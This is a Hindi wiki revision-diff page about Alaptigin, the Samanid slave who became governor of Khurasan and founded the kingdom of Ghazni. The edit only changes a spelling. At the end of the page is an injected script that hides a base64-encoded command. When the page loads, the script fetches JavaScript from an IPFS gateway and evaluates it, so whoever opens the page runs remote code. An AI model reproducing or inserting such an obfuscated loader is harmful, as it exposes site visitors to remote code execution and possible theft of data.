Difference between revisions of "अलप्तगीन"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "गुलाम" to "ग़ुलाम")
 
Line 1: Line 1:
'''अलप्तगीन''' समनी वंश के शासक अबुल मलिक का गुलाम था। उसकी प्रतिभा और सैनिक गुणों से प्रभावित होकर अबुल मलिक ने उसे [[खुरासान]] का गवर्नर नियुक्त कर दिया था।
+
'''अलप्तगीन''' समनी वंश के शासक अबुल मलिक का ग़ुलाम था। उसकी प्रतिभा और सैनिक गुणों से प्रभावित होकर अबुल मलिक ने उसे [[खुरासान]] का गवर्नर नियुक्त कर दिया था।
  
 
*जब अबुल मलिक की मृत्यु हो गई, तब अलप्तगीन ने [[अफ़ग़ानिस्तान]] के पास एक नया राज्य स्थापित किया और [[ग़ज़नी]] को अपनी राजधानी बनाया।
 
*जब अबुल मलिक की मृत्यु हो गई, तब अलप्तगीन ने [[अफ़ग़ानिस्तान]] के पास एक नया राज्य स्थापित किया और [[ग़ज़नी]] को अपनी राजधानी बनाया।
*977 में अलप्तगीन की मृत्यु हो गई। उसकी मृत्यु के बाद उसका दामाद [[सुबुक्तगीन]], जो कि पहले गुलाम था और जिसके वीरोचित्त गुणों से प्रभावित होकर अलप्तगीन ने उसे अपनी बेटी ब्याही थी, ग़ज़नी की गद्दी पर बैठा।
+
*977 में अलप्तगीन की मृत्यु हो गई। उसकी मृत्यु के बाद उसका दामाद [[सुबुक्तगीन]], जो कि पहले ग़ुलाम था और जिसके वीरोचित्त गुणों से प्रभावित होकर अलप्तगीन ने उसे अपनी बेटी ब्याही थी, ग़ज़नी की गद्दी पर बैठा।
  
 
{{लेख प्रगति|आधार=|प्रारम्भिक= प्रारम्भिक1|माध्यमिक= |पूर्णता= |शोध= }}
 
{{लेख प्रगति|आधार=|प्रारम्भिक= प्रारम्भिक1|माध्यमिक= |पूर्णता= |शोध= }}

Latest revision as of 14:03, 6 April 2015

alaptagin samani vansh ke shasak abul malik ka gulam tha. usaki pratibha aur sainik gunoan se prabhavit hokar abul malik ne use khurasan ka gavarnar niyukt kar diya tha.

  • jab abul malik ki mrityu ho gee, tab alaptagin ne afaganistan ke pas ek naya rajy sthapit kiya aur gazani ko apani rajadhani banaya.
  • 977 mean alaptagin ki mrityu ho gee. usaki mrityu ke bad usaka damad subuktagin, jo ki pahale gulam tha aur jisake virochitt gunoan se prabhavit hokar alaptagin ne use apani beti byahi thi, gazani ki gaddi par baitha.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

bahari k diyaan

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>